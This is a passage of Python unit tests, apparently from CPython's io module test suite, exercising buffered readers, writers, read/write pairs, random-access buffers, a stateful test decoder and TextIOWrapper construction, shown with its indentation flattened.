data = b'a' * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = array.array('i', b'x' * 32)
assert len(b) != 16
n = bufio.readinto(b)
self.assertGreater(n, len(b))
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * len(bm[n:]))
def test_readinto1_array(self):
buffer_size = 60
data = b'a' * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = array.array('i', b'x' * 32)
assert len(b) != 16
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * len(bm[n:]))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b'abc\n', b'd\n', b'ef'))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b'abc\n', b'd\n', b'ef'])
self.assertEqual(bufio().readlines(5), [b'abc\n', b'd\n'])
self.assertEqual(bufio().readlines(None), [b'abc\n', b'd\n', b'ef'])
def test_buffering(self):
data = b'abcdefghi'
dlen = len(data)
tests = [[100, [3, 1, 4, 8], [dlen, 0]], [100, [3, 3, 3], [dlen]],
[4, [1, 2, 4, 2], [4, 4, 1]]]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos + nbytes])
pos += nbytes
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
rawio = self.MockRawIO((b'abc', b'd', None, b'efg', None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b'abcd', bufio.read(6))
self.assertEqual(b'e', bufio.read(1))
self.assertEqual(b'fg', bufio.read())
self.assertEqual(b'', bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b'', bufio.read())
rawio = self.MockRawIO((b'a', None, None))
self.assertEqual(b'a', rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
self.assertEqual(b'abcdefg', bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
self.assertEqual(b'abcdefg', bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, 'wb') as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02)
self.assertFalse(errors,
'the following exceptions were caught: %r' % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b'A' * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b'x' * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b'x' * n)
self.assertEqual(rawio._extraneous_reads, 0,
'failed for {}: {} != 0'.format(n, rawio._extraneous_reads))
rawio = self.MockRawIO([b'x' * (n - 1), b'x'])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b'x' * n)
self.assertEqual(rawio._extraneous_reads, 0,
'failed for {}: {} != 0'.format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
b = io.BufferedReader(io.BytesIO(b'12'))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
if sys.maxsize > 2147483647:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b'abc'])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, 'w+b')
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
with self.assertRaisesRegex(TypeError, 'BufferedReader'):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = 'wb'
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b'abc'))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b'ghi'))
bufio.flush()
self.assertEqual(b''.join(rawio._write_stack), b'abcghi')
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute', bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b'howdy!')
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b'howdy!'])
def test_write(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b'abc')
self.assertFalse(writer._write_stack)
buffer = bytearray(b'def')
bufio.write(buffer)
buffer[:] = b'***'
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b'abcdefghijklmnop'
for n in range(0, len(contents), 3):
bufio.write(contents[n:n + 3])
flushed = b''.join(writer._write_stack)
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n + size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b''.join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b'abcd'), 4)
self.assertEqual(bufio.write(b'efghi'), 5)
raw.block_on(b'k')
self.assertEqual(bufio.write(b'jklmn'), 5)
raw.block_on(b'0')
try:
bufio.write(b'opqrwxyz0123456789')
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail('BlockingIOError should have been raised')
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(), b'abcdefghijklmnopqrwxyz')
self.assertEqual(bufio.write(b'ABCDEFGHI'), 9)
s = raw.pop_written()
self.assertTrue(s.startswith(b'01234567A'), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b'abcdef'), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b'XY'), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b'XYcdef')
self.assertEqual(bufio.write(b'123456'), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b'XYcdef123456')
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b'abc')
bufio.flush()
self.assertEqual(b'abc', writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b'abc')
del bufio
support.gc_collect()
self.assertEqual(b'abc', writer._write_stack[0])
def test_truncate(self):
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b'abcdef')
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, 'rb', buffering=0) as f:
self.assertEqual(f.read(), b'abc')
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n + size])
n += size
del contents
with self.open(support.TESTFN, self.write_mode, buffering=0
) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02)
self.assertFalse(errors,
'the following exceptions were caught: %r' % errors)
bufio.close()
with self.open(support.TESTFN, 'rb') as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b'abcdef')
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close)
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
if sys.maxsize > 2147483647:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b'def')
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b'def')
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b'def')
def test_garbage_collection(self):
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, 'w+b')
f = self.tp(rawio)
f.write(b'123xxx')
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.read(), b'123xxx')
def test_args_error(self):
with self.assertRaisesRegex(TypeError, 'BufferedWriter'):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute', pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute', pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b'abcdef'), self.MockRawIO())
self.assertEqual(pair.read(3), b'abc')
self.assertEqual(pair.read(1), b'd')
self.assertEqual(pair.read(), b'ef')
pair = self.tp(self.BytesIO(b'abc'), self.MockRawIO())
self.assertEqual(pair.read(None), b'abc')
def test_readlines(self):
pair = lambda : self.tp(self.BytesIO(b'abc\ndef\nh'), self.MockRawIO())
self.assertEqual(pair().readlines(), [b'abc\n', b'def\n', b'h'])
self.assertEqual(pair().readlines(), [b'abc\n', b'def\n', b'h'])
self.assertEqual(pair().readlines(5), [b'abc\n', b'def\n'])
def test_read1(self):
pair = self.tp(self.BytesIO(b'abcdef'), self.MockRawIO())
self.assertEqual(pair.read1(3), b'abc')
def test_readinto(self):
for method in ('readinto', 'readinto1'):
with self.subTest(method):
pair = self.tp(self.BytesIO(b'abcdef'), self.MockRawIO())
data = byteslike(b'\x00' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b'abcde')
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b'abc')
pair.flush()
buffer = bytearray(b'def')
pair.write(buffer)
buffer[:] = b'***'
pair.flush()
self.assertEqual(w._write_stack, [b'abc', b'def'])
def test_peek(self):
pair = self.tp(self.BytesIO(b'abcdef'), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b'abc'))
self.assertEqual(pair.read(3), b'abc')
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = 'rb+'
write_mode = 'wb+'
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b'asdf', b'ghjk'))
rw = self.tp(raw, 8)
self.assertEqual(b'as', rw.read(2))
rw.write(b'ddd')
rw.write(b'eee')
self.assertFalse(raw._write_stack)
self.assertEqual(b'ghjk', rw.read())
self.assertEqual(b'dddeee', raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b'asdfghjkl')
rw = self.tp(raw)
self.assertEqual(b'as', rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b'asdf', rw.read(4))
rw.write(b'123f')
rw.seek(0, 0)
self.assertEqual(b'asdf123fl', rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b'fl', rw.read(11))
rw.flush()
self.assertEqual(b'asdf123fl', raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b'abcdefghi')
bufio = self.tp(raw)
self.assertEqual(b'ab', read_func(bufio, 2))
bufio.write(b'12')
self.assertEqual(b'ef', read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b'ghi', read_func(bufio))
raw.seek(0, 0)
raw.write(b'XYZ')
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b'XYZ', read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b'abcdefghi')
bufio = self.tp(raw)
bufio.write(b'123')
bufio.flush()
bufio.write(b'45')
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b'12345fghi', raw.getvalue())
self.assertEqual(b'12345fghi', bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
for overwrite_size in [1, 5]:
raw = self.BytesIO(b'A' * 10)
bufio = self.tp(raw, 4)
self.assertEqual(bufio.read(1), b'A')
self.assertEqual(bufio.tell(), 1)
bufio.write(b'B' * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s, b'A' + b'B' * overwrite_size + b'A' * (9 -
overwrite_size))
def test_write_rewind_write(self):
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
bufio.seek(pos1)
bufio.write(b'\x01')
b = b'\x80\x81\x82\x83\x84'
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
'failed result for i=%d, j=%d' % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b'A' * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b'AA')
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b'BB'), 2)
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b'1')
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b'2')
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
if sys.maxsize > 2147483647:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
with self.assertRaisesRegex(TypeError, 'BufferedRandom'):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1
return bytes(self.buffer), i * 100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0:
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else:
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer:
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0))
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0))
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-' * self.o
if self.o:
output = output[:self.o]
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(name='test_decoder', encode=latin1.
encode, decode=None, incrementalencoder=None, streamreader=
None, streamwriter=None, incrementaldecoder=cls)
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [(b'abcd', False, 'a.b.c.d.'), (b'oiabcd', True, 'abcd.'),
(b'oi...abcd...', True, 'abcd.'), (b'i.o6.x.xyz.toolongtofit.',
False, 'x-----.xyz---.toolon.'), (b'i.i2.o6xyz', True,
'xy----.z-----.'), (b'i.o3.i6.abcdefghijklmnop', True,
'abc.ghi.mno.'), (
b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m',
True, 'a----------------------------.' +
'b----------------------------.' + 'cde--------------------------.' +
'abcdefghijabcde.' + 'a.b------------.' + '.c.------------.' +
'd.e------------.' + 'k--------------.' + 'l--------------.' +
'm--------------.')]
def test_decoder(self):
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b'AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n'
self.normalized = b'AAA\nBBB\nCCC\nDDD\nEEE\n'.decode('ascii')
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b'\xc3\xa9\n\n')
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding='latin-1', newline='\r\n')
self.assertEqual(t.encoding, 'latin-1')
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding='utf-8', line_buffering=True)
self.assertEqual(t.encoding, 'utf-8')
self.assertEqual(t.line_buffering, True)
self.assertEqual('é\n', t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute', t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, 'is not a text encoding'):
self.TextIOWrapper(b, encoding='hex')
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
